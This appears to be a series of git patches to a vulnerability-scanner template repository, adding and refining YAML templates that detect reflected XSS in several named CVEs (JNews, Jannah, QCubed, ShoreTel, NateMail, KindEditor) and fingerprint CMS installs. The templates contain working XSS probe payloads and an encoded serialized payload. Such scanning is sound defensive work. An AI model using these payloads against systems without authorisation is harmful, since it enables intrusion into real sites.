<60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:02:38 +0700 Subject: [PATCH 284/339] Create CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-24342.yaml diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml new file mode 100644 index 0000000000..e71b29702b --- /dev/null +++ b/cves/2021/CVE-2021-24342.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-24342 + +info: + name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. + reference: + - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e + - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 + tags: cves,cve2021,wordpress,xss + +requests: + - raw: + - | + POST /?ajax-request=jnews HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From 9cf31a5078e59bd4cbed3c9bb168eb357970db9c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:20 +0700 Subject: [PATCH 285/339] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index f10ff32829..8d02f10378 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -4,7 +4,7 @@ info: name: Jannah < 5.4.4 (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 From 7a88129ee83a215f1207568294b97d617c3f12c3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:03:37 +0700 Subject: [PATCH 286/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 669cda4004..8d87b74364 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -4,7 +4,7 @@ info: name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS) author: pikpikcu severity: medium - description: he Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. + description: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability. reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 @@ -18,7 +18,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - action=tie_ajax_search&query[]= + action=tie_ajax_search&query[]= matchers-condition: and matchers: From 88c319a1482eb17effe8915adea584128ddb2f32 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:04:51 +0700 Subject: [PATCH 287/339] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index e71b29702b..2aaf4ec9f9 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -17,7 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and From 468d4277e81c47584800bbea6269d177dd3750e0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 12:19:07 +0700 Subject: [PATCH 288/339] Create shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/shopizer-detect.yaml diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml new file mode 100644 index 0000000000..3989e78c19 --- /dev/null +++ b/technologies/shopizer-detect.yaml @@ -0,0 +1,23 @@ +id: shopizer-detect + +info: + name: Shopizer Detection + author: pikpikcu + severity: info + tags: tech,shopizer + +requests: + - method: GET + path: + - "{{BaseURL}}/shop/" + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Powered by Date: Wed, 15 Sep 2021 12:30:08 +0700 Subject: [PATCH 289/339] Create getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/getsimple-cms-detect.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml new file mode 100644 index 0000000000..175287a663 --- /dev/null +++ b/technologies/getsimple-cms-detect.yaml @@ -0,0 +1,22 @@ +id: getsimple-cms-detect + +info: + name: GetSimple CMS Detection + author: pikpikcu + severity: info + tags: tech,getsimple + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/index.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "GetSimple CMS" From bb8e0616e97ed2471010906361e7a686a4f084ff Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:00:51 +0700 Subject: [PATCH 290/339] Create CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2020/CVE-2020-24912.yaml diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml new file mode 100644 index 0000000000..6978460d19 --- /dev/null +++ b/cves/2020/CVE-2020-24912.yaml @@ -0,0 +1,38 @@ + +id: CVE-2020-24912 + +info: + name: QCube Cross-Site-Scripting + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + reference: + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - http://seclists.org/fulldisclosure/2021/Mar/30 + tags: cves,cve2020,qcubed,xss + +requests: + - method: POST + path: + - "{{BaseURL}}/assets/_core/php/profile.php" + - "{{BaseURL}}/assets/php/profile.php" + - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + + matchers-condition: and + matchers: + + - type: word + words: + - 'strProfileData' + - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From 80072c8e97dd7400ad8aa90114a250bac3519670 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:13:50 +0700 Subject: [PATCH 291/339] Create CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-28351.yaml diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml new file mode 100644 index 0000000000..e83c29aa1b --- /dev/null +++ b/cves/2020/CVE-2020-28351.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + tags: cves,cve2020,shoretel,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - 'onmouseover=alert(document.domain)' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From bc6470a65a3cddcae2a03fea55341fa459f83d25 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 14:10:34 +0700 Subject: [PATCH 292/339] Create CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2019/CVE-2019-13392.yaml diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml new file mode 100644 index 0000000000..6f097447c2 --- /dev/null +++ b/cves/2019/CVE-2019-13392.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-13392 + +info: + name: MindPalette NateMail 3.0.15 - (XSS) + author: pikpikcu + severity: medium + description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + reference: + - https://www.doyler.net/security-not-included/natemail-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 + tags: cves,cve2019,natemail,xss + +requests: + - raw: + - | + POST /NateMail.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From d89b82f8102e85b06dab9272a474e85e5cbddebb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:35:51 +0530 Subject: [PATCH 293/339] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 2aaf4ec9f9..6a8299a894 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-plugin requests: - raw: @@ -18,14 +18,14 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 1a50ce7b865700967e3801c7c9c7dec990e706f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:39:45 +0530 Subject: [PATCH 294/339] Update shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml index 3989e78c19..76636075ff 100644 --- a/technologies/shopizer-detect.yaml +++ b/technologies/shopizer-detect.yaml @@ -9,8 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/shop/" - "{{BaseURL}}" + - "{{BaseURL}}/shop/" matchers-condition: and matchers: @@ -21,3 +21,4 @@ requests: - type: word words: - 'Powered by Date: Wed, 15 Sep 2021 17:31:01 +0700 Subject: [PATCH 295/339] Create CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000141.yaml diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml new file mode 100644 index 0000000000..c02f8e592a --- /dev/null +++ b/cves/2016/CVE-2016-1000141.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000141 + +info: + name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 40b630e5cd8196d7350a259b654151bb053bfdf9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 10:50:34 +0000 Subject: [PATCH 296/339] Auto Generated CVE annotations [Wed Sep 15 10:50:34 UTC 2021] :robot: --- cves/2021/CVE-2021-24342.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 6a8299a894..dccaee5040 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 tags: cves,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24342 + cwe-id: CWE-79 requests: - raw: From 86a369132ede3f59e595b606ff49d940f9dfa16d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:49:18 +0530 Subject: [PATCH 297/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 6978460d19..c406a00d11 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -1,4 +1,3 @@ - id: CVE-2020-24912 info: @@ -10,7 +9,7 @@ info: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss requests: From bc1d5674551181f925bc741aed6a7fa523c0df1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:50:33 +0530 Subject: [PATCH 298/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index c406a00d11..1e3633256c 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss From 781f09984834ff1ff5eb6b4f24dfdb2f012d6cab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:57:27 +0530 Subject: [PATCH 299/339] Create getsimple-installation.yaml --- exposed-panels/getsimple-installation.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/getsimple-installation.yaml diff --git a/exposed-panels/getsimple-installation.yaml b/exposed-panels/getsimple-installation.yaml new file mode 100644 index 0000000000..273493ca04 --- /dev/null +++ b/exposed-panels/getsimple-installation.yaml @@ -0,0 +1,25 @@ +id: getsimple-installation + +info: + name: GetSimple CMS Installation + author: princechaddha + severity: high + reference: http://get-simple.info/ + tags: getsimple,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/install.php" + + matchers-condition: and + matchers: + - type: word + words: + - "GetSimple » Installation" + - "PHP Version" + condition: and + + - type: status + status: + - 200 From 8d74383b0c13812a2e812d6cd5a8292c6d951e1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:00:00 +0530 Subject: [PATCH 300/339] Update getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 175287a663..931a074037 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/admin/index.php" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -19,4 +19,5 @@ requests: - type: word words: - - "GetSimple CMS" + - "Powered by GetSimple" + part: body From 68cdcd3034ec1c98965ff2b73dcf652a17d4e903 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:20:24 +0530 Subject: [PATCH 301/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 1e3633256c..26baa66321 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -4,7 +4,7 @@ info: name: QCube Cross-Site-Scripting author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 @@ -26,8 +26,7 @@ requests: - type: word words: - - 'strProfileData' - - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + - "" part: body - type: word From 18534fa69212b240626fe1c35e5ac83fbd7a7e9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 11:53:20 +0000 Subject: [PATCH 302/339] Auto Generated CVE annotations [Wed Sep 15 11:53:20 UTC 2021] :robot: --- cves/2020/CVE-2020-24912.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 26baa66321..d4d917d90d 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24912 + cwe-id: CWE-79 requests: - method: POST From 6539892061287c382028fcb6edbe6fb386112122 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:24:42 +0530 Subject: [PATCH 303/339] Update CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index e83c29aa1b..d759a88588 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" headers: Content-Type: application/x-www-form-urlencoded @@ -22,7 +22,7 @@ requests: - type: word words: - - 'onmouseover=alert(document.domain)' + - '' part: body - type: word From 19bbdef5397f2e1db3cabd6a4413750b78288972 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:29:47 +0530 Subject: [PATCH 304/339] Update CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index c02f8e592a..2d67f13122 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -1,22 +1,23 @@ id: CVE-2016-1000141 info: - name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 9e090c8098e865a9fa3d55232115e982faa4d305 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:32:32 +0530 Subject: [PATCH 305/339] Update CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index 6f097447c2..fe641a6446 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -18,21 +18,17 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header - - - type: status - status: - - 200 + words: + - text/html From f19daba61699aa43244960bfd4c6ac4c94b9ce4e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 12:04:47 +0000 Subject: [PATCH 306/339] Auto Generated CVE annotations [Wed Sep 15 12:04:47 UTC 2021] :robot: --- cves/2016/CVE-2016-1000141.yaml | 5 +++++ cves/2020/CVE-2020-28351.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index 2d67f13122..6450289e6c 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index d759a88588..11a660996c 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 tags: cves,cve2020,shoretel,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 requests: - method: GET From 46201a340ba582fe94b100bd2a6acb8522f8f84a Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 15 Sep 2021 19:52:49 +0530 Subject: [PATCH 307/339] duplicate template --- technologies/minio-detect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/minio-detect.yaml diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml deleted file mode 100644 index aab5ca4231..0000000000 --- a/technologies/minio-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: minio-detect - -info: - name: Minio Detection - author: pdteam - severity: info - tags: tech,minio - -requests: - - method: GET - path: - - "{{BaseURL}}/minio/login" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "MinIO Browser" \ No newline at end of file From df64158ca6f9348c76ced1f86d01d03d8f1ebc88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:35:05 +0700 Subject: [PATCH 308/339] Create CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-7543.yaml diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml new file mode 100644 index 0000000000..a3c1d32ec5 --- /dev/null +++ b/cves/2019/CVE-2019-7543.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-7543 + +info: + name: KindEditor 4.1.11, the php/demo.php - (XSS) + author: pikpikcu + severity: medium + description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor + - 